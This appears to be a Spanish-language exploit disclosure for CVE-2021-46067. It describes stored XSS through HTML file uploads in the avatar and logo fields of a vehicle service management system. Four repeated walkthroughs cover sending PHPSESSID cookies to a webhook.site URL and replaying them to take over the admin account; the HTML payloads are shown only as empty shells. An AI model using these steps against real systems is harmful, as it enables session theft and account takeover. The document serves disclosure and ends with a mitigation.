CVE-2021-46067
Título del Exploit: Sistema de Gestión de Servicio de Vehículos - 'Múltiple' Robo de Cookies Conduce a la Toma Completa de la Cuenta
Autor del Exploit: SANU P.L
CVE: CVE-2021-46067
CVSS: 9.8 CRÍTICO
Referencias:
Descripción:
En el Sistema de Gestión de Servicio de Vehículos 1.0, un atacante puede robar las cookies lo que lleva a una Toma Completa de la Cuenta.
1. Sistema de Gestión de Servicio de Vehículos - 'MiCuenta' (/admin/?page=user)
Explotación:
- Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
- Navegue a la sección Mi Cuenta http://localhost/vehicle_service/admin/?page=user
- Genere la URL del Webhook - https://webhook.site
- Copie la URL única del Webhook y péguela en el siguiente código html.
Payload:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Guarde el código html anterior, por ejemplo: Cookie Stealing.html
- En la sección Mi Cuenta, ingrese todos los detalles requeridos y seleccione el archivo html en Avatar.
- Haga clic en el botón de actualizar.
- Abra la imagen del avatar en una nueva pestaña y verifique el estado del Webhook.
- Obtuvimos la solicitud, contiene PHPSESSID.
- Copie el valor de PHPSESSID y abra cualquier otro navegador.
- Visite el panel de administración http://localhost/vehicle_service/admin
- Verifique los valores de las cookies y cambie el valor de PHPSESSID por el valor copiado.
- Ahora acceda al panel de administración http://localhost/vehicle_service/admin
- Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.
2. Sistema de Gestión de Servicio de Vehículos - 'Lista de Usuarios' (/admin/?page=user/manage_user)
Explotación:
- Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
- Navegue a la sección Lista de Usuarios y haga clic en el botón Crear Nuevo.
- Genere la URL del Webhook - https://webhook.site
- Copie la URL única del Webhook y péguela en el siguiente código html.
Payload:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Guarde el código html anterior, por ejemplo: Cookie Stealing.html
- En la sección Crear Nuevo Usuario, ingrese todos los detalles requeridos y seleccione el archivo html en Avatar.
- Haga clic en el botón Guardar.
- Abra la imagen del avatar en una nueva pestaña y verifique el estado del Webhook.
- Obtuvimos la solicitud, contiene PHPSESSID.
- Copie el valor de PHPSESSID y abra cualquier otro navegador.
- Visite el panel de administración http://localhost/vehicle_service/admin
- Verifique los valores de las cookies y cambie el valor de PHPSESSID por el valor copiado.
- Ahora acceda al panel de administración http://localhost/vehicle_service/admin
- Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.
3. Sistema de Gestión de Servicio de Vehículos - 'Configuración-Logo del Sistema' (/admin/?page=system_info)
Explotación:
- Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
- Navegue a la sección Configuración http://localhost/vehicle_service/admin/?page=system_info
- Genere la URL del Webhook - https://webhook.site
- Copie la URL única del Webhook y péguela en el siguiente código html.
Payload:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Guarde el código html anterior, por ejemplo: Cookie Stealing.html
- En la sección Configuración, ingrese todos los detalles requeridos y seleccione el archivo html en Logo del Sistema.
- Haga clic en el botón de actualizar.
- Abra la imagen del Logo del Sistema en una nueva pestaña y verifique el estado del Webhook.
- Obtuvimos la solicitud, contiene PHPSESSID.
- Copie el valor de PHPSESSID y abra cualquier otro navegador.
- Visite el panel de administración http://localhost/vehicle_service/admin
- Verifique los valores de las cookies y cambie el valor de PHPSESSID por el valor copiado.
- Ahora acceda al panel de administración http://localhost/vehicle_service/admin
- Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.
4. Sistema de Gestión de Servicio de Vehículos - 'Configuración-Portada del Sitio Web' (/admin/?page=system_info)
Explotación:
- Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
- Navegue a la sección Configuración http://localhost/vehicle_service/admin/?page=system_info
- Genere la URL del Webhook - https://webhook.site
- Copie la URL única del Webhook y péguela en el siguiente código html.
Payload:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Guarde el código html anterior, por ejemplo: Cookie Stealing.html
- En la sección Configuración, ingrese todos los detalles requeridos y seleccione el archivo html en Portada del Sitio Web.
- Haga clic en el botón de actualizar.
- Abra la imagen de la Portada del Sitio Web en una nueva pestaña y verifique el estado del Webhook.
- Obtuvimos la solicitud, contiene PHPSESSID.
- Copie el valor de PHPSESSID y abra cualquier otro navegador.
- Visite el panel de administración http://localhost/vehicle_service/admin
- Verifique los valores de las cookies y cambie el valor de PHPSESSID por el valor copiado.
- Ahora acceda al panel de administración http://localhost/vehicle_service/admin
- Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.
Impacto:
Un atacante sube un archivo html malicioso que redirige a un sitio web de terceros y las cookies quedan expuestas en la solicitud. Esto lleva a una Toma Completa de la Cuenta.
Mitigación:
Se recomienda validar la funcionalidad de carga de archivos y realizar comprobaciones secundarias en la sesión.